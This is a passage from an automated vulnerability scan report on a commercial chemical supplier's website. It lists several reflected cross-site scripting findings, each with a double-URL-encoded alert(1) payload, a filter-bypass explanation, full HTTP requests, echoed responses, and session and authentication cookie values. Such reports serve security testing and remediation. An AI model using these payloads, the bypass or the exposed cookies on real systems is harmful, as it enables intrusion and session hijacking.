Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:23 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product/62562";alert(1)//abedcc9514b","E404") ;
   </script>
...[SNIP]...

1.609. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175e3%2522%253balert%25281%2529%252f%252f33e8961aff1 was submitted in the REST URL parameter 1. This input was echoed as 175e3";alert(1)//33e8961aff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich175e3%2522%253balert%25281%2529%252f%252f33e8961aff1/help/help-welcome/ordering-product/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:13 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich175e3";alert(1)//33e8961aff1/help/help-welcome/ordering-product/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.610. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d70%2522%253balert%25281%2529%252f%252fb4b75ed686f was submitted in the REST URL parameter 2. This input was echoed as d0d70";alert(1)//b4b75ed686f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/helpd0d70%2522%253balert%25281%2529%252f%252fb4b75ed686f/help-welcome/ordering-product/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:14 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/helpd0d70";alert(1)//b4b75ed686f/help-welcome/ordering-product/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.611. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fed%2522%253balert%25281%2529%252f%252fd0a8380dcdc was submitted in the REST URL parameter 3. This input was echoed as 55fed";alert(1)//d0a8380dcdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome55fed%2522%253balert%25281%2529%252f%252fd0a8380dcdc/ordering-product/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:16 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome55fed";alert(1)//d0a8380dcdc/ordering-product/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.612. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615f5%2522%253balert%25281%2529%252f%252f4c657ed6f0 was submitted in the REST URL parameter 4. This input was echoed as 615f5";alert(1)//4c657ed6f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product615f5%2522%253balert%25281%2529%252f%252f4c657ed6f0/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:18 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product615f5";alert(1)//4c657ed6f0/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.613. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23722%2522%253balert%25281%2529%252f%252f5c1450bf436 was submitted in the REST URL parameter 5. This input was echoed as 23722";alert(1)//5c1450bf436 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product/23722%2522%253balert%25281%2529%252f%252f5c1450bf436 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
